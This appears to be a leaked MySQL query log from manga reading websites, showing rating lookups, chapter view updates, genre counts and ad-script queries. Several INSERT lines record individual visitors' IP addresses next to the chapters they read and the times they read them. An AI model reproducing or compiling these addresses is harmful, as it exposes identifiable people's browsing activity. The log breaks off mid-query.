mangauser@localhost on u317079482_mangacherri_2 using Socket 330639909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330639909 Quit 330639910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330639910 Quit 330639911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330639911 Quit 330639912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639912 Quit 330639913 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5793' 330639913 Quit 330639914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639914 Query select * FROM chapters where id = '5793' 330639914 Quit 330639915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639915 Query select * FROM chapters where manga_id = '115' order by id desc 330639915 Quit 330639916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639916 Query Update chapters set view=view+1 where id = '5793' 330639916 Quit 330639917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639917 Query select * FROM chapters where id = '5793' 330639917 Quit 330639918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639918 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5793' 330639918 Quit 330639919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639919 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('115', '5793', '2a00:23c4:8690:7501:7d93:2194:38b6:fb00', 'mangacherri.com', '2026-02-26 03:28:02', '2026-02-26 03:28:02') 330639919 Quit 330639920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639920 Query select * FROM chapter_images where chapter_id = '5793' 330639920 Quit 330639921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639921 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '115' and m.active = 1 330639922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639921 Quit 330639922 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='115' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Gyaru%' OR genres like '%Romance%' OR genres like '%School%') ORDER BY RAND() limit 10 330639884 Quit 330639923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639902 Quit 330639924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639923 Quit 330639924 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639924 Quit 330639925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639925 Quit 330639926 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639926 Quit 330639927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639927 Quit 330639928 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639928 Quit 330639929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639929 Quit 330639930 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639930 Quit 330639931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639931 Quit 330639932 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639932 Quit 330639933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639933 Quit 330639934 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639934 Quit 330639935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639935 Quit 330639936 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639936 Quit 330639937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639937 Quit 330639938 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639938 Quit 330639939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639939 Quit 330639940 Query select k.* from (select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where genres like '%Psychological%') as k where latest_chapter_id > 0 330639922 Quit 330639941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639941 Quit 330639942 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639942 Quit 330639943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639944 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639943 Quit 330639944 Quit 330639945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639946 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639945 Quit 330639946 Quit 330639947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639947 Quit 330639948 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639948 Quit 260225 19:28:03 330639949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639949 Quit 330639950 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2026' 330639950 Quit 330639951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639951 Query select * FROM chapters where id = '2026' 330639951 Quit 330639952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639952 Query select * FROM chapters where manga_id = '51' order by id desc 330639952 Quit 330639953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639953 Query Update chapters set view=view+1 where id = '2026' 330639953 Quit 330639954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639954 Query select * FROM chapters where id = '2026' 330639955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639954 Quit 330639955 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2026' 330639955 Quit 330639956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639956 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('51', '2026', '115.70.62.74', 'mangacherri.com', '2026-02-26 03:28:03', '2026-02-26 03:28:03') 330639956 Quit 330639957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639957 Query select * FROM chapter_images where chapter_id = '2026' 330639957 Quit 330639958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639958 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '51' and m.active = 1 330639958 Quit 330639959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639959 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='51' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330639940 Quit 330639960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639960 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where m.genres like '%Psychological%' group by manga_id ORDER BY sum(view) DESC 330639960 Quit 330639961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639961 Quit 330639962 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639962 Quit 330639963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330639963 Quit 330639964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330639964 Quit 330639965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330639965 Quit 330639966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330639966 Quit 330639967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330639967 Quit 330639968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330639968 Quit 330639969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330639969 Quit 330639970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330639970 Quit 330639971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330639971 Quit 330639972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330639972 Quit 330639973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330639973 Quit 330639974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330639974 Quit 330639975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330639975 Quit 330639976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330639976 Quit 330639977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330639977 Quit 330639978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330639978 Quit 330639979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330639979 Quit 330639980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330639980 Quit 330639981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330639981 Quit 330639982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330639982 Quit 330639983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330639983 Quit 330639984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330639984 Quit 330639985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330639985 Quit 330639959 Quit 330639986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639986 Quit 330639987 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639987 Quit 330639988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639988 Quit 330639989 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639989 Quit 330639990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639991 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639990 Quit 330639991 Quit 330639992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639992 Quit 330639993 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330639993 Quit 330639994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639994 Quit 330639995 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9893' 330639995 Quit 330639996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639996 Query select * FROM chapters where id = '9893' 330639996 Quit 330639997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639997 Query select * FROM chapters where manga_id = '58' order by id desc 330639997 Quit 330639998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639998 Query Update chapters set view=view+1 where id = '9893' 330639998 Quit 330639999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639999 Query select * FROM chapters where id = '9893' 330639999 Quit 330640000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640000 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9893' 330640000 Quit 330640001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640001 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('58', '9893', '2607:fb90:74af:c0df:c818:7dd0:7152:f2ef', 'mangacherri.com', '2026-02-26 03:28:03', '2026-02-26 03:28:03') 330640001 Quit 330640002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640002 Query select * FROM chapter_images where chapter_id = '9893' 330640002 Quit 330640003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640003 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '58' and m.active = 1 330640004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640004 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='58' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330640003 Quit 330640005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640005 Quit 330640006 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16516' 330640006 Quit 330640007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640007 Query select * FROM chapters where id = '16516' 330640007 Quit 330640008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640008 Query select * FROM chapters where manga_id = '332' order by id desc 330640008 Quit 330640009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640009 Query Update chapters set view=view+1 where id = '16516' 330640009 Quit 330640010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640010 Query select * FROM chapters where id = '16516' 330640010 Quit 330640011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640011 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16516' 330640011 Quit 330640012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640012 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('332', '16516', '2400:c600:3376:5a58:d02:c349:edf9:8931', 'mangacherri.com', '2026-02-26 03:28:03', '2026-02-26 03:28:03') 330640012 Quit 330640013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640013 Query select * FROM chapter_images where chapter_id = '16516' 330640013 Quit 330640014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640014 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '332' and m.active = 1 330640014 Quit 330640015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640015 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='332' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:28:04 330637692 Quit 330640016 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640016 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330640016 Quit 330640017 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640018 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640017 Quit 330640018 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330640018 Quit 330640004 Quit 330640019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640019 Quit 330640020 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330640020 Quit 330640021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640021 Quit 330640022 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330640022 Quit 330640023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640023 Quit 330640024 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330640024 Quit 330640025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640025 Quit 330640026 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330640026 Quit 330640027 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330640027 Quit 330640028 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330640028 Quit 330640029 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330640029 Quit 330640030 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330640030 Quit 330640031 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330640031 Quit 330640032 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330640032 Quit 330640033 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330640033 Quit 330640034 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330640034 Quit 330640035 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330640035 Quit 330640036 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330640036 Quit 330640037 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330640037 Quit 330640038 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330640038 Quit 330640039 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330640039 Quit 330640040 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330640040 Quit 330640041 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330640041 Quit 330640042 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330640042 Quit 330640043 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330640043 Quit 330640044 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330640044 Quit 330640045 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330640045 Quit 330640046 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330640046 Quit 330640047 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330640047 Quit 330640048 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330640048 Quit 330640049 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330640049 Quit 330640050 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330640050 Quit 330640051 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330640051 Quit 330640052 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330640052 Quit 330640053 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330640053 Quit 330640054 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330640054 Quit 330640055 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330640055 Quit 330640056 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '163' order by created desc 330640056 Quit 330640057 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330640057 Quit 330640058 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330640058 Quit 330640059 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330640059 Quit 330640060 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330640060 Quit 330640061 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330640061 Quit 330640062 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640062 Query select count(id) as total_rating, (sum(rating) / 